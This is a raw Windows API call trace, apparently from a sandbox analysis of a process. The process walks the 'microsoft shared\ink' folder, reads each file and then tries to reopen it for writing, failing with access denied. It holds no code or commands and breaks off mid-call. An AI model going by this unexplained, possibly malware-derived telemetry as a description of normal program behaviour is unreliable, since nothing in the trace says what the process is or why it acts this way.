1 [0100.127] AreFileApisANSI () returned 1 [0100.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0100.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x84fe0 [0100.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll") returned 74 [0100.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.127] GetLastError () returned 0x5 [0100.127] GetLastError () returned 0x5 [0100.127] SetLastError (dwErrCode=0x5) [0100.127] GetLastError () returned 0x5 [0100.127] SetLastError (dwErrCode=0x5) [0100.127] GetLastError () returned 0x5 [0100.127] SetLastError (dwErrCode=0x5) [0100.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0100.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0100.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.127] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0100.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0100.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.128] AreFileApisANSI () returned 1 [0100.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml", lpUsedDefaultChar=0x0) returned 62 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.129] AreFileApisANSI () returned 1 [0100.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0100.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned 62 [0100.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.129] GetFileType (hFile=0x368) returned 0x1 [0100.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.129] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.129] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.129] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.130] CloseHandle (hObject=0x368) returned 1 [0100.130] AreFileApisANSI () returned 1 [0100.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned 62 [0100.130] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.130] GetLastError () returned 0x5 [0100.130] GetLastError () returned 0x5 [0100.130] SetLastError (dwErrCode=0x5) [0100.130] GetLastError () returned 0x5 [0100.130] SetLastError (dwErrCode=0x5) [0100.130] GetLastError () returned 0x5 [0100.130] SetLastError (dwErrCode=0x5) [0100.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.130] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.131] AreFileApisANSI () returned 1 [0100.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml", lpUsedDefaultChar=0x0) returned 62 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0100.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.132] AreFileApisANSI () returned 1 [0100.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 62 [0100.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.132] GetFileType (hFile=0x368) returned 0x1 [0100.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.132] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.132] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.132] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.133] CloseHandle (hObject=0x368) returned 1 [0100.133] AreFileApisANSI () returned 1 [0100.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0100.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 62 [0100.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.133] GetLastError () returned 0x5 [0100.133] GetLastError () returned 0x5 [0100.133] SetLastError (dwErrCode=0x5) [0100.133] GetLastError () returned 0x5 [0100.133] SetLastError (dwErrCode=0x5) [0100.133] GetLastError () returned 0x5 [0100.133] SetLastError (dwErrCode=0x5) [0100.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0100.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.133] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0100.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0100.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0100.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.134] AreFileApisANSI () returned 1 [0100.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml", lpUsedDefaultChar=0x0) returned 62 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0100.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.135] AreFileApisANSI () returned 1 [0100.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0100.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 62 [0100.135] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.135] GetFileType (hFile=0x368) returned 0x1 [0100.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.135] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.135] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.135] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.136] CloseHandle (hObject=0x368) returned 1 [0100.136] AreFileApisANSI () returned 1 [0100.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e7a0 [0100.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=62 | out: 